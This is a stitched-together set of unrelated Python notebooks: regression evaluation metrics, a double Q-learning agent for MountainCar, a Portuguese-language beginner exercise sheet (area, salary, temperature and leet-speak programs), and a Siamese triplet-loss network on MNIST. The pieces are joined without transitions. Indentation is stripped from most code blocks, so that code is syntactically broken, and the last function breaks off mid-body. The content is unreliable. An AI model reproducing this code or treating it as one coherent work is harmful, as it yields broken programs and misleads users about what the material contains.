> **r2_score**: The **r2_score** function computes the coefficient of determination R², i.e., the proportion of the variance in the target that is explained by the model.
> **mae**: The **mean absolute error** function calculates the average absolute distance between the real data and the predicted data.
> **mse**: The **mean squared error** function averages the squared errors, penalizing the model more heavily for large errors.
```
y_pred=model.predict(X_test)
print("R2 Score: {:.2f} %".format(r2_score(y_test,y_pred)*100))
print("Mean Absolute Error {:.2f}".format(mean_absolute_error(y_test,y_pred)))
print("Mean Squared Error {:.2f}".format(mean_squared_error(y_test,y_pred)))
```
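These metrics can also be verified by hand; a minimal sketch with made-up true and predicted values (plain NumPy, not the notebook's model):

```python
import numpy as np

y_true = np.array([3.0, -0.5, 2.0, 7.0])
y_hat  = np.array([2.5,  0.0, 2.0, 8.0])

mae = np.mean(np.abs(y_true - y_hat))           # mean absolute error
mse = np.mean((y_true - y_hat) ** 2)            # mean squared error
ss_res = np.sum((y_true - y_hat) ** 2)          # residual sum of squares
ss_tot = np.sum((y_true - y_true.mean()) ** 2)  # total sum of squares
r2 = 1 - ss_res / ss_tot                        # coefficient of determination
print(mae, mse, r2)  # 0.5, 0.375, ~0.949
```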
#### Prediction Plot
We plot the first 20 actual values from the test set in green and the model's predictions for the same records in red, so the two curves can be compared visually.
```
plt.figure(figsize=(14,10))
plt.plot(range(20),y_test[0:20], color = "green")
plt.plot(range(20),model.predict(X_test[0:20]), color = "red")
plt.legend(["Actual", "prediction"])
plt.title("Predicted vs True Value")
plt.xlabel("Record number")
plt.ylabel(target)
plt.show()
```
#### Creator: Vamsi Mukkamala , Github: [Profile](https://github.com/vmc99)
```
import gym
import numpy as np
import matplotlib.pyplot as plt
import sys
env = gym.make('MountainCar-v0')
LEARNING_RATE = 0.1
NUM_EPISODES = 500
DISCOUNT_FACTOR = 0.95
DISCRETE_OS_SIZE = [20] * len(env.observation_space.high)
discrete_os_win_size = (env.observation_space.high-env.observation_space.low)/DISCRETE_OS_SIZE[0]
#q_table = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))
q_table_1 = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))
q_table_2 = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))
def get_discrete_state(state):
discrete_state = (state-env.observation_space.low)/discrete_os_win_size
    return tuple(discrete_state.astype(int))
def make_epsilon_greedy_policy(epsilon, q_table_1, q_table_2):
def policy_fn(state):
        # Average the two tables element-wise instead of looping over states
        q_table_avg = (q_table_1 + q_table_2) / 2
actions = q_table_avg[state]
A = np.ones(len(actions), dtype=float) * (epsilon / len(actions))
best_action = np.argmax(actions)
A[best_action] += 1 - epsilon
return A
return policy_fn
policy = make_epsilon_greedy_policy(0.05, q_table_1, q_table_2)
episode_lengths = [0] * NUM_EPISODES
episode_rewards = [0] * NUM_EPISODES
for i_episode in range(NUM_EPISODES):
state = env.reset()
done = False
if (i_episode+1) % 100 == 0:
print('\r', i_episode+1, end='')
sys.stdout.flush()
while not done:
#if i_episode % 100 == 0:
# env.render()
discrete_state = get_discrete_state(state)
action_probs = policy(discrete_state)
action = np.random.choice(np.arange(len(action_probs)), p=action_probs)
next_state, reward, done, _ = env.step(action)
episode_lengths[i_episode] += 1
episode_rewards[i_episode] += reward
if not done:
discrete_next_state = get_discrete_state(next_state)
if np.random.random() > 0.5:
best_next_q_value = q_table_2[discrete_next_state][np.argmax(q_table_1[discrete_next_state])]
target = reward + DISCOUNT_FACTOR * best_next_q_value
q_table_1[discrete_state][action] += LEARNING_RATE * (target - q_table_1[discrete_state][action])
else:
best_next_q_value = q_table_1[discrete_next_state][np.argmax(q_table_2[discrete_next_state])]
target = reward + DISCOUNT_FACTOR * best_next_q_value
q_table_2[discrete_state][action] += LEARNING_RATE * (target - q_table_2[discrete_state][action])
elif next_state[0] >= env.goal_position:
q_table_1[discrete_state][action] = 0
q_table_2[discrete_state][action] = 0
state = next_state
# Use this with the training function from the DQN file
class QAgent:
def __init__(self, env):
self.epsilon = 0.5
self.epsilon_max = 0.5
self.epsilon_min = 0.1
self.epsilon_decay = (self.epsilon_max - self.epsilon_min) / 1000
self.discount_factor = 0.95
self.learning_rate = 0.1
self.state_size = len(env.observation_space.high)
self.action_size = env.action_space.n
self.discrete_table_size = 20
self.q_table = self.build_model()
def build_model(self):
table_size = [self.discrete_table_size] * self.state_size
q_table = np.random.uniform(low=-2, high=0, size=(table_size+[self.action_size]))
return q_table
def get_discrete_state(self, state):
normalized_state = (state - env.observation_space.low) / (env.observation_space.high - env.observation_space.low)
rescaled_state = normalized_state * self.discrete_table_size
        # Clip so states on the upper boundary don't index past the table
        return tuple(np.clip(rescaled_state, 0, self.discrete_table_size - 1).astype(int))
def act(self, state):
if self.epsilon_max >= self.epsilon >= self.epsilon_min:
self.epsilon -= self.epsilon_decay
discrete_state = self.get_discrete_state(state)
if np.random.random() > self.epsilon:
q_values = self.q_table[discrete_state]
return np.argmax(q_values)
else:
return np.random.choice(np.arange(self.action_size))
def update(self, state, action, reward, next_state, done):
discrete_state = self.get_discrete_state(state)
if next_state[0] >= env.goal_position:
self.q_table[discrete_state][action] = 0
else:
discrete_next_state = self.get_discrete_state(next_state)
best_next_q_value = np.max(self.q_table[discrete_next_state])
target = reward + self.discount_factor * best_next_q_value
self.q_table[discrete_state][action] += self.learning_rate * (target - self.q_table[discrete_state][action])
x_double = np.convolve(episode_rewards, np.ones((20,))/20, mode='valid')
fig = plt.plot(x_double)
plt.show()
x = np.convolve(episode_rewards, np.ones((20,))/20, mode='valid')
fig = plt.plot(x)
plt.show()
fig = plt.figure()
ax = plt.axes(projection='3d')
x = np.arange(20)
y = np.arange(20)
X, Y = np.meshgrid(x, y)
# Plot the value surface: max over actions of the averaged Q-tables
ax.plot_wireframe(X, Y, np.max((q_table_1 + q_table_2) / 2, axis=2), color='green')
plt.show()
q_table_avg = (q_table_1 + q_table_2) / 2  # element-wise average of both tables
q_table_avg
```
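The double Q-learning update used above can be isolated in a tiny sketch (hand-picked numbers, a single state with two actions):

```python
import numpy as np

LEARNING_RATE, DISCOUNT_FACTOR = 0.1, 0.95

q1_next = np.array([1.0, 0.0])  # Q-table 1 values for the next state
q2_next = np.array([0.0, 2.0])  # Q-table 2 values for the next state
q1_current = 1.0                # Q-table 1 value for the (state, action) being updated
reward = -1.0

# Double Q-learning: pick the greedy next action with table 1,
# but evaluate it with table 2 (decouples selection from evaluation)
best_next_action = np.argmax(q1_next)                  # action 0
target = reward + DISCOUNT_FACTOR * q2_next[best_next_action]  # -1 + 0.95 * 0
q1_current += LEARNING_RATE * (target - q1_current)    # 1 + 0.1 * (-2) = 0.8
print(q1_current)
```

Note how the plain-Q estimate would have used `max(q1_next)` for both selection and evaluation, which tends to overestimate values.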
## Exercise 01
### Programming Languages and Paradigms
Janaina Emilia
<br /> <b>RA</b> 816114781
1- Write a program that asks for the radius of a circle, then
computes and displays its area.
```
import math
raio = float(input("Digite o valor do raio:"))
area = math.pi * (raio ** 2)
print("A área do circulo é: ", area)
```
2- Write a program that computes the area of a square, then
displays twice that area to the user.
```
lado = float(input("Digite o valor do lado:"))
area = lado ** 2
print("O dobro da área do quadrado é: ", area*2)
```
3- Write a program that asks how much you earn per hour and the
number of hours worked in the month, then computes and displays
your total salary for that month.
```
valor_hora = float(input("Quanto você ganha por hora?"))
horas_mes = float(input("Quantas horas você trabalha por mês?"))
salario = valor_hora * horas_mes
print("Seu salário mensal é: ", salario)
```
4- Write a program that asks for a temperature in degrees Fahrenheit,
then converts and displays it in degrees Celsius: C = (5 * (F - 32)) / 9.
```
temperatura_f = float(input("Digite uma temperatura em Farenheit:"))
temperatura_c = (5 * (temperatura_f - 32)) / 9
print("A temperatura em Celcius é: ", temperatura_c)
```
5- Write a program that asks for a temperature in degrees Celsius,
then converts and displays it in degrees Fahrenheit.
```
temperatura_c = float(input("Digite uma temperatura em Celsius:"))
temperatura_f = ((temperatura_c / 5) * 9) + 32
print("A temperatura em Farenheit é: ", temperatura_f)
```
6- Write a program that asks for 2 integers and one real number.
Compute and display:
- the product of double the first with half the second.
- the sum of triple the first with the third.
- the third raised to the cube.
```
a = int(input("Digite o valor de A:"))
b = int(input("Digite o valor de B:"))
c = float(input("Digite o valor de C:"))
print("O produto do dobro do primeiro com metade do segundo:", (a * 2) * (b / 2))
print("A soma do triplo do primeiro com o terceiro", (a * 3) + c)
print("O terceiro elevado ao cubo", c ** 3)
```
7- João Papo-de-Pescador, an honest man, bought a microcomputer to track the daily yield of his work. Whenever he brings in a catch of fish heavier than the limit set by the fishing regulations of the state of São Paulo (50 kilos), he must pay a fine of R$ 4.00 per excess kilo. João needs a program that reads the variable peso (weight of fish) and checks whether there is any excess. If so, store the excess in the variable excesso and the fine João must pay in the variable multa.
Otherwise, display those variables with the value ZERO.
```
peso = float(input("Informe o peso:"))
excesso = 0
multa = 0
if(peso > 50):
excesso = peso - 50
multa = excesso * 4
print("Peso excedido: ", excesso)
print("Valor da multa: ", multa)
```
8- Write a program that asks how much you earn per hour and the
number of hours worked in the month. Compute and display your
total salary for that month, knowing that 11% is deducted for
income tax (IR), 8% for INSS and 5% for the union. The program
should report:
- gross salary.
- how much was paid to INSS.
- how much was paid to the union.
- net salary.
- compute the deductions and the net salary as in the table below:
+Gross Salary: R$
-IR (11%): R$
-INSS (8%): R$
-Union (5%): R$
=Net Salary: R$
Note: Gross Salary - Deductions = Net Salary.
```
valor_hora = float(input("Quanto você ganha por hora?"))
horas_mes = float(input("Quantas horas você trabalha por mês?"))
salario_bruto = valor_hora * horas_mes
imposto_de_renda = salario_bruto * 0.11
inss = salario_bruto * 0.08
sindicato = salario_bruto * 0.05
salario_liquido = salario_bruto - (imposto_de_renda + inss + sindicato)
print("Seu salário bruto mensal é: ", salario_bruto)
print("Valor do Imposto de Renda: ", imposto_de_renda)
print("Valor do INSS: ", inss)
print("Valor do Sindicato: ", sindicato)
print("Seu salário liquido mensal é: ", salario_liquido)
```
9- Write a program that reads 2 strings and displays their contents
followed by their lengths. Also report whether the two strings have
the same length, and whether they are equal or different in content.
Example:
String 1: Brasil Hexa 2018
String 2: Brasil! Hexa 2018!
Tamanho de "Brasil Hexa 2018": 16 caracteres
Tamanho de "Brasil! Hexa 2018!": 18 caracteres
As duas strings são de tamanhos diferentes.
As duas strings possuem conteúdo diferente.
```
string_a = input("Digite a primeira frase: ")
string_b = input("Digite a segunda frase: ")
print("String 1: ", string_a)
print("String 2: ", string_b)
print("Tamanho de " + string_a + ": ", len(string_a))
print("Tamanho de " + string_b + ": ", len(string_b))
if(len(string_a) == len(string_b)):
print("As duas strings tem o mesmo tamanho.")
else:
print("As duas strings tem tamanho diferente.")
if(string_a == string_b):
print("As duas strings possuem o mesmo conteúdo.")
else:
print("As duas strings possuem conteúdo diferente.")
```
10- Write a program that lets the user type their name and then
displays it backwards, in uppercase letters only. Hint: remember
that the user may type uppercase or lowercase letters.
Note: do not use loops.
```
username = input("Digite seu nome:")
print(username[::-1].upper())
```
11- Write a program that asks for the user's date of birth
(dd/mm/yyyy) and prints the date with the month name spelled out.
Data de Nascimento: 29/10/1973
Você nasceu em 29 de Outubro de 1973.
Note: do not use conditionals or loops.
```
import locale
from datetime import date
locale.setlocale(locale.LC_TIME, 'portuguese_brazil')  # on Linux/macOS use 'pt_BR.UTF-8'
data_nascimento = input("Informe a data de nascimento: (dd/mm/aa)").split("/")
data = date(day=int(data_nascimento[0]), month=int(data_nascimento[1]), year=int(data_nascimento[2]))
data_formatada = data.strftime('%d de %B de %Y')  # avoid shadowing the builtin str
print("Você nasceu em", data_formatada)
```
12- Leet is a way of writing the Latin alphabet using other symbols
in place of the letters, numbers for example. The word leet itself
admits many variations, such as l33t or 1337. The use of leet
reflects a subculture tied to the world of computer games and the
internet, and is often used to confuse beginners and to assert
membership in a group. Research the main ways of translating the
letters. Then write a program that asks for a text and converts it
to leet speak.
Challenge: do not use loops or conditionals.
```
string = input("Digite um texto qualquer: ")
translation = {"a": "4", "A": "4", "e": "3", "E": "3", "i": "1", "I": "1", "o": "0", "O": "0", "t": "7", "T": "7", "s": '5', "S": '5'}
string = string.translate(str.maketrans(translation))
print(string)
```
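The loop-free solution above relies on the standard library's `str.maketrans` / `str.translate` pair; a minimal standalone sketch (reduced character mapping, for brevity):

```python
# Build a one-character-to-one-character translation table
table = str.maketrans({"a": "4", "e": "3", "l": "1", "t": "7"})

# translate applies the table to every character in one pass, no loop needed
print("leet speak".translate(table))  # → "1337 sp34k"
```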
# Siamese Neural Network with Triplet Loss trained on MNIST
## Cameron Trotter
### c.trotter2@ncl.ac.uk
This notebook builds an SNN to determine similarity scores between MNIST digits using a triplet loss function. The use of class prototypes at inference time is also explored.
This notebook is based heavily on the approach described in [this Coursera course](https://www.coursera.org/learn/siamese-network-triplet-loss-keras/), which in turn is based on the [FaceNet](https://arxiv.org/abs/1503.03832) paper. Any uses of open-source code are linked throughout where utilised.
For an in-depth guide to understand this code, and the theory behind it, please see LINK.
### Imports
```
# TF 1.14 gives lots of warnings for deprecations ready for the switch to TF 2.0
import warnings
warnings.filterwarnings('ignore')
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
import random
import os
import glob
from datetime import datetime
from tensorflow.keras.models import model_from_json
from tensorflow.keras.callbacks import Callback, CSVLogger, ModelCheckpoint
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.layers import Activation, Input, concatenate
from tensorflow.keras.layers import Layer, BatchNormalization, MaxPooling2D, Concatenate, Lambda, Flatten, Dense
from tensorflow.keras.initializers import glorot_uniform, he_uniform
from tensorflow.keras.regularizers import l2
from tensorflow.keras.utils import multi_gpu_model
from sklearn.decomposition import PCA
from sklearn.metrics import roc_curve, roc_auc_score
import math
from math import dist  # Euclidean distance between two points (Python 3.8+)
import json
from tensorflow.python.client import device_lib
import matplotlib.gridspec as gridspec
```
## Import the data and reshape for use with the SNN
The data loaded in must be in the same format as `tf.keras.datasets.mnist.load_data()`, that is `(x_train, y_train), (x_test, y_test)`
```
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
num_classes = len(np.unique(y_train))
x_train_w = x_train.shape[1] # (60000, 28, 28)
x_train_h = x_train.shape[2]
x_test_w = x_test.shape[1]
x_test_h = x_test.shape[2]
x_train_w_h = x_train_w * x_train_h # 28 * 28 = 784
x_test_w_h = x_test_w * x_test_h
x_train = np.reshape(x_train, (x_train.shape[0], x_train_w_h))/255. # (60000, 784)
x_test = np.reshape(x_test, (x_test.shape[0], x_test_w_h))/255.
```
### Plotting the triplets
```
def plot_triplets(examples):
plt.figure(figsize=(6, 2))
for i in range(3):
plt.subplot(1, 3, 1 + i)
plt.imshow(np.reshape(examples[i], (x_train_w, x_train_h)), cmap='binary')
plt.xticks([])
plt.yticks([])
plt.show()
plot_triplets([x_train[0], x_train[1], x_train[2]])
```
### Create triplet batches
Random batches are generated by `create_batch`. Semi-hard triplet batches are generated by `create_batch_hard`.
Semi-hard: dist(A, P) < dist(A, N) < dist(A, P) + margin. Using only easy triplets leads to no learning. Hard triplets generate high loss and strongly influence the training parameters, but a mislabelled example can then cause an outsized weight update.
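A quick sketch of how a triplet falls into one of the three categories, given precomputed anchor-positive and anchor-negative distances (made-up values, margin 0.2):

```python
def triplet_category(d_ap, d_an, margin=0.2):
    """Classify a triplet by its anchor-positive vs anchor-negative distance."""
    if d_an > d_ap + margin:
        return "easy"       # loss is already zero; nothing to learn
    if d_ap < d_an:
        return "semi-hard"  # negative further than positive, but inside the margin
    return "hard"           # negative closer than the positive

print(triplet_category(0.5, 0.9))  # easy
print(triplet_category(0.5, 0.6))  # semi-hard
print(triplet_category(0.5, 0.4))  # hard
```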
```
def create_batch(batch_size=256, split = "train"):
x_anchors = np.zeros((batch_size, x_train_w_h))
x_positives = np.zeros((batch_size, x_train_w_h))
x_negatives = np.zeros((batch_size, x_train_w_h))
if split =="train":
data = x_train
data_y = y_train
else:
data = x_test
data_y = y_test
for i in range(0, batch_size):
# We need to find an anchor, a positive example and a negative example
random_index = random.randint(0, data.shape[0] - 1)
x_anchor = data[random_index]
y = data_y[random_index]
indices_for_pos = np.squeeze(np.where(data_y == y))
indices_for_neg = np.squeeze(np.where(data_y != y))
x_positive = data[indices_for_pos[random.randint(0, len(indices_for_pos) - 1)]]
x_negative = data[indices_for_neg[random.randint(0, len(indices_for_neg) - 1)]]
x_anchors[i] = x_anchor
x_positives[i] = x_positive
x_negatives[i] = x_negative
return [x_anchors, x_positives, x_negatives]
def create_hard_batch(batch_size, num_hard, split = "train"):
x_anchors = np.zeros((batch_size, x_train_w_h))
x_positives = np.zeros((batch_size, x_train_w_h))
x_negatives = np.zeros((batch_size, x_train_w_h))
if split =="train":
data = x_train
data_y = y_train
else:
data = x_test
data_y = y_test
# Generate num_hard number of hard examples:
hard_batches = []
batch_losses = []
rand_batches = []
# Get some random batches
for i in range(0, batch_size):
hard_batches.append(create_batch(1, split))
A_emb = embedding_model.predict(hard_batches[i][0])
P_emb = embedding_model.predict(hard_batches[i][1])
N_emb = embedding_model.predict(hard_batches[i][2])
# Compute d(A, P) - d(A, N) for each selected batch
batch_losses.append(np.sum(np.square(A_emb-P_emb),axis=1) - np.sum(np.square(A_emb-N_emb),axis=1))
    # Sort the batches by loss, highest first, and keep num_hard of them
    hard_batch_selections = [x for _, x in sorted(zip(batch_losses, hard_batches), key=lambda x: x[0], reverse=True)]
    hard_batches = hard_batch_selections[:num_hard]
# Get batch_size - num_hard number of random examples
num_rand = batch_size - num_hard
for i in range(0, num_rand):
rand_batch = create_batch(1, split)
rand_batches.append(rand_batch)
selections = hard_batches + rand_batches
for i in range(0, len(selections)):
x_anchors[i] = selections[i][0]
x_positives[i] = selections[i][1]
x_negatives[i] = selections[i][2]
return [x_anchors, x_positives, x_negatives]
```
### Create the Embedding Model
This model takes in input image and generates some `emb_size`-dimensional embedding for the image, plotted on some latent space.
The untrained model's embedding space is stored for later use when comparing clustering between the untrained and the trained model using PCA, based on [this notebook](https://github.com/AdrianUng/keras-triplet-loss-mnist/blob/master/Triplet_loss_KERAS_semi_hard_from_TF.ipynb).
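A minimal sketch of that PCA step, using random stand-in embeddings rather than the model's output:

```python
import numpy as np
from sklearn.decomposition import PCA

rng = np.random.default_rng(0)
embeddings = rng.normal(size=(500, 10))  # stand-in for 500 emb_size=10 embeddings

# Project the 10-D embeddings down to 2-D for plotting
pca = PCA(n_components=2)
decomposed = pca.fit_transform(embeddings)
print(decomposed.shape)  # 500 points in 2-D
```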
```
def create_embedding_model(emb_size):
embedding_model = tf.keras.models.Sequential([
Dense(4096,
activation='relu',
kernel_regularizer=l2(1e-3),
kernel_initializer='he_uniform',
input_shape=(x_train_w_h,)),
Dense(emb_size,
activation=None,
kernel_regularizer=l2(1e-3),
kernel_initializer='he_uniform')
])
embedding_model.summary()
return embedding_model
```
### Create the SNN
This model takes a triplet image input, passes each image through the embedding model, then concatenates the three embeddings together for the loss function.
```
def create_SNN(embedding_model):
input_anchor = tf.keras.layers.Input(shape=(x_train_w_h,))
input_positive = tf.keras.layers.Input(shape=(x_train_w_h,))
input_negative = tf.keras.layers.Input(shape=(x_train_w_h,))
embedding_anchor = embedding_model(input_anchor)
embedding_positive = embedding_model(input_positive)
embedding_negative = embedding_model(input_negative)
output = tf.keras.layers.concatenate([embedding_anchor, embedding_positive,
embedding_negative], axis=1)
siamese_net = tf.keras.models.Model([input_anchor, input_positive, input_negative],
output)
siamese_net.summary()
return siamese_net
```
### Create the Triplet Loss Function
```
def triplet_loss(y_true, y_pred):
anchor, positive, negative = y_pred[:,:emb_size], y_pred[:,emb_size:2*emb_size],y_pred[:,2*emb_size:]
positive_dist = tf.reduce_mean(tf.square(anchor - positive), axis=1)
negative_dist = tf.reduce_mean(tf.square(anchor - negative), axis=1)
return tf.maximum(positive_dist - negative_dist + alpha, 0.)
```
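The loss can be sanity-checked outside TensorFlow with NumPy (toy 2-D embeddings, alpha = 0.2):

```python
import numpy as np

alpha = 0.2
anchor   = np.array([[0.0, 0.0]])
positive = np.array([[0.3, 0.0]])  # mean squared distance to anchor: 0.045
negative = np.array([[1.0, 0.0]])  # mean squared distance to anchor: 0.5

pos_dist = np.mean(np.square(anchor - positive), axis=1)
neg_dist = np.mean(np.square(anchor - negative), axis=1)
loss = np.maximum(pos_dist - neg_dist + alpha, 0.0)
print(loss)  # 0.045 - 0.5 + 0.2 < 0, so the hinge clamps the loss to 0
```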
### Data Generator
This function creates hard batches for the network to train on. `y` is required by TF but not by our model, so just return a filler to keep TF happy.
```
def data_generator(batch_size=256, num_hard=50, split="train"):
while True:
x = create_hard_batch(batch_size, num_hard, split)
y = np.zeros((batch_size, 3*emb_size))
yield x, y
```
### Evaluation
Allows for the model's metrics to be visualised and evaluated. Based on [this Medium post](https://medium.com/@crimy/one-shot-learning-siamese-networks-and-triplet-loss-with-keras-2885ed022352) and [this GitHub notebook](https://github.com/asagar60/One-Shot-Learning/blob/master/Omniglot_data/One_shot_implementation.ipynb).
```
def compute_dist(a,b):
return np.linalg.norm(a-b)
def compute_probs(network,X,Y):
'''
Input
network : current NN to compute embeddings
X : tensor of shape (m,w,h,1) containing pics to evaluate
Y : tensor of shape (m,) containing true class
Returns
probs : array of shape (m,m) containing distances
'''
m = X.shape[0]
nbevaluation = int(m*(m-1)/2)
probs = np.zeros((nbevaluation))
y = np.zeros((nbevaluation))
#Compute all embeddings for all imgs with current embedding network
embeddings = embedding_model.predict(X)
k = 0
# For each img in the evaluation set
for i in range(m):
# Against all other images
for j in range(i+1,m):
# compute the probability of being the right decision : it should be 1 for right class, 0 for all other classes
probs[k] = -compute_dist(embeddings[i,:],embeddings[j,:])
if (Y[i]==Y[j]):
y[k] = 1
#print("{3}:{0} vs {1} : \t\t\t{2}\tSAME".format(i,j,probs[k],k, Y[i], Y[j]))
else:
y[k] = 0
#print("{3}:{0} vs {1} : {2}\tDIFF".format(i,j,probs[k],k, Y[i], Y[j]))
k += 1
return probs, y
def compute_metrics(probs,yprobs):
'''
Returns
fpr : Increasing false positive rates such that element i is the false positive rate of predictions with score >= thresholds[i]
tpr : Increasing true positive rates such that element i is the true positive rate of predictions with score >= thresholds[i].
thresholds : Decreasing thresholds on the decision function used to compute fpr and tpr. thresholds[0] represents no instances being predicted and is arbitrarily set to max(y_score) + 1
auc : Area Under the ROC Curve metric
'''
# calculate AUC
auc = roc_auc_score(yprobs, probs)
# calculate roc curve
fpr, tpr, thresholds = roc_curve(yprobs, probs)
return fpr, tpr, thresholds,auc
def draw_roc(fpr, tpr,thresholds, auc):
#find threshold
targetfpr=1e-3
_, idx = find_nearest(fpr,targetfpr)
threshold = thresholds[idx]
recall = tpr[idx]
# plot no skill
plt.plot([0, 1], [0, 1], linestyle='--')
# plot the roc curve for the model
plt.plot(fpr, tpr, marker='.')
plt.title('AUC: {0:.3f}\nSensitivity : {2:.1%} @FPR={1:.0e}\nThreshold={3})'.format(auc,targetfpr,recall,abs(threshold) ))
# show the plot
plt.show()
def find_nearest(array,value):
idx = np.searchsorted(array, value, side="left")
if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):
return array[idx-1],idx-1
else:
return array[idx],idx
def draw_interdist(network, epochs):
interdist = compute_interdist(network)
data = []
for i in range(num_classes):
data.append(np.delete(interdist[i,:],[i]))
fig, ax = plt.subplots()
ax.set_title('Evaluating embeddings distance from each other after {0} epochs'.format(epochs))
ax.set_ylim([0,3])
plt.xlabel('Classes')
plt.ylabel('Distance')
ax.boxplot(data,showfliers=False,showbox=True)
locs, labels = plt.xticks()
plt.xticks(locs,np.arange(num_classes))
plt.show()
def compute_interdist(network):
'''
Computes sum of distances between all classes embeddings on our reference test image:
d(0,1) + d(0,2) + ... + d(0,9) + d(1,2) + d(1,3) + ... d(8,9)
    A good model should have a large distance between all of these embeddings
Returns:
array of shape (num_classes,num_classes)
'''
res = np.zeros((num_classes,num_classes))
ref_images = np.zeros((num_classes, x_test_w_h))
    # Generate embeddings for one reference image per class
    for i in range(num_classes):
        ref_images[i,:] = x_test[np.where(y_test == i)[0][0]]
ref_embeddings = network.predict(ref_images)
for i in range(num_classes):
for j in range(num_classes):
res[i,j] = dist(ref_embeddings[i],ref_embeddings[j])
return res
def DrawTestImage(network, images, refidx=0):
'''
Evaluate some pictures vs some samples in the test set
image must be of shape(1,w,h,c)
Returns
scores : result of the similarity scores with the basic images => (N)
'''
nbimages = images.shape[0]
    # Generate embeddings for the given images
    image_embedings = network.predict(images)
    # Generate embeddings for the reference images
ref_images = np.zeros((num_classes,x_test_w_h))
for i in range(num_classes):
images_at_this_index_are_of_class_i = np.squeeze(np.where(y_test == i))
ref_images[i,:] = x_test[images_at_this_index_are_of_class_i[refidx]]
ref_embedings = network.predict(ref_images)
for i in range(nbimages):
# Prepare the figure
fig=plt.figure(figsize=(16,2))
subplot = fig.add_subplot(1,num_classes+1,1)
plt.axis("off")
plotidx = 2
# Draw this image
plt.imshow(np.reshape(images[i], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')
subplot.title.set_text("Test image")
for ref in range(num_classes):
#Compute distance between this images and references
dist = compute_dist(image_embedings[i,:],ref_embedings[ref,:])
#Draw
subplot = fig.add_subplot(1,num_classes+1,plotidx)
plt.axis("off")
plt.imshow(np.reshape(ref_images[ref, :], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')
subplot.title.set_text(("Class {0}\n{1:.3e}".format(ref,dist)))
plotidx += 1
def generate_prototypes(x_data, y_data, embedding_model):
classes = np.unique(y_data)
prototypes = {}
for c in classes:
#c = classes[0]
# Find all images of the chosen test class
locations_of_c = np.where(y_data == c)[0]
imgs_of_c = x_data[locations_of_c]
imgs_of_c_embeddings = embedding_model.predict(imgs_of_c)
# Get the median of the embeddings to generate a prototype for the class (reshaping for PCA)
prototype_for_c = np.median(imgs_of_c_embeddings, axis = 0).reshape(1, -1)
# Add it to the prototype dict
prototypes[c] = prototype_for_c
return prototypes
def test_one_shot_prototypes(network, sample_embeddings):
distances_from_img_to_test_against = []
# As the img to test against is in index 0, we compare distances between img@0 and all others
for i in range(1, len(sample_embeddings)):
distances_from_img_to_test_against.append(compute_dist(sample_embeddings[0], sample_embeddings[i]))
# As the correct img will be at distances_from_img_to_test_against index 0 (sample_imgs index 1),
# If the smallest distance in distances_from_img_to_test_against is at index 0,
# we know the one shot test got the right answer
is_min = distances_from_img_to_test_against[0] == min(distances_from_img_to_test_against)
is_max = distances_from_img_to_test_against[0] == max(distances_from_img_to_test_against)
return int(is_min and not is_max)
def n_way_accuracy_prototypes(n_val, n_way, network):
num_correct = 0
for val_step in range(n_val):
num_correct += load_one_shot_test_batch_prototypes(n_way, network)
accuracy = num_correct / n_val * 100
return accuracy
def load_one_shot_test_batch_prototypes(n_way, network):
labels = np.unique(y_test)
# Reduce the label set down from size n_classes to n_samples
labels = np.random.choice(labels, size = n_way, replace = False)
# Choose a class as the test image
label = random.choice(labels)
# Find all images of the chosen test class
imgs_of_label = np.where(y_test == label)[0]
    # Randomly select a test image of the selected class, return its index
img_of_label_idx = random.choice(imgs_of_label)
# Expand the array at the selected indexes into useable images
img_of_label = np.expand_dims(x_test[img_of_label_idx],axis=0)
sample_embeddings = []
# Get the anchor image embedding
anchor_prototype = network.predict(img_of_label)
sample_embeddings.append(anchor_prototype)
# Get the prototype embedding for the positive class
positive_prototype = prototypes[label]
sample_embeddings.append(positive_prototype)
# Get the negative prototype embeddings
    # Remove the selected test class from the list of labels based on its index
label_idx_in_labels = np.where(labels == label)[0]
other_labels = np.delete(labels, label_idx_in_labels)
# Get the embedding for each of the remaining negatives
for other_label in other_labels:
negative_prototype = prototypes[other_label]
sample_embeddings.append(negative_prototype)
correct = test_one_shot_prototypes(network, sample_embeddings)
return correct
def visualise_n_way_prototypes(n_samples, network):
labels = np.unique(y_test)
# Reduce the label set down from size n_classes to n_samples
labels = np.random.choice(labels, size = n_samples, replace = False)
# Choose a class as the test image
label = random.choice(labels)
# Find all images of the chosen test class
imgs_of_label = np.where(y_test == label)[0]
# Randomly select a test image of the selected class, return it's index
img_of_label_idx = random.choice(imgs_of_label)
# Get another image idx that we know is of the test class for the sample set
label_sample_img_idx = random.choice(imgs_of_label)
# Expand the array at the selected indexes into useable images
img_of_label = np.expand_dims(x_test[img_of_label_idx],axis=0)
label_sample_img = np.expand_dims(x_test[label_sample_img_idx],axis=0)
# Make the first img in the sample set the chosen test image, the second the other image
sample_imgs = np.empty((0, x_test_w_h))
sample_imgs = np.append(sample_imgs, img_of_label, axis=0)
sample_imgs = np.append(sample_imgs, label_sample_img, axis=0)
sample_embeddings = []
# Get the anchor embedding image
anchor_prototype = network.predict(img_of_label)
sample_embeddings.append(anchor_prototype)
# Get the prototype embedding for the positive class
positive_prototype = prototypes[label]
sample_embeddings.append(positive_prototype)
# Get the negative prototype embeddings
    # Remove the selected test class from the list of labels based on its index
label_idx_in_labels = np.where(labels == label)[0]
other_labels = np.delete(labels, label_idx_in_labels)
# Get the embedding for each of the remaining negatives
for other_label in other_labels:
negative_prototype = prototypes[other_label]
sample_embeddings.append(negative_prototype)
# Find all images of the other class
imgs_of_other_label = np.where(y_test == other_label)[0]
        # Randomly select an image of the selected class, return its index
another_sample_img_idx = random.choice(imgs_of_other_label)
# Expand the array at the selected index into useable images
another_sample_img = np.expand_dims(x_test[another_sample_img_idx],axis=0)
# Add the image to the support set
sample_imgs = np.append(sample_imgs, another_sample_img, axis=0)
distances_from_img_to_test_against = []
# As the img to test against is in index 0, we compare distances between img@0 and all others
for i in range(1, len(sample_embeddings)):
distances_from_img_to_test_against.append(compute_dist(sample_embeddings[0], sample_embeddings[i]))
# + 1 as distances_from_img_to_test_against doesn't include the test image
